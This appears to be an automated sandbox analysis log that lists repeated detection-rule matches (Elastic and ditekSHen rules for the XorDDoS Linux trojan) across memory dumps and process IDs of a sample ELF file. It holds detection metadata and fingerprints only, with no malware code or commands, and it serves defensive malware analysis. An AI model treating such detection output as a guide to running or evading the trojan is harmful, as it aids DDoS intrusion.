Source: 6581.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6581.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6425.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6425.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6425.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6528.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6314.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6314.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6314.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6471.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6471.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6471.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6505.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6505.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6505.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6443.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6405.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6405.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6405.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6598.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6598.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6598.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6587.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6587.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6587.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6438.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6438.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6438.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6547.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6547.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6547.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6463.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6463.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6463.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6328.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6328.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6328.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6542.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6542.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6542.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6452.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6293.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6293.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6293.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6476.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6476.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6476.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6260, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6262, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6263, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6264, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6293, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6296, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6298, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6301, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6303, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6311, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6314, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6316, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6319, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6322, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6328, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6331, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6333, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6335, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6338, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6364, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
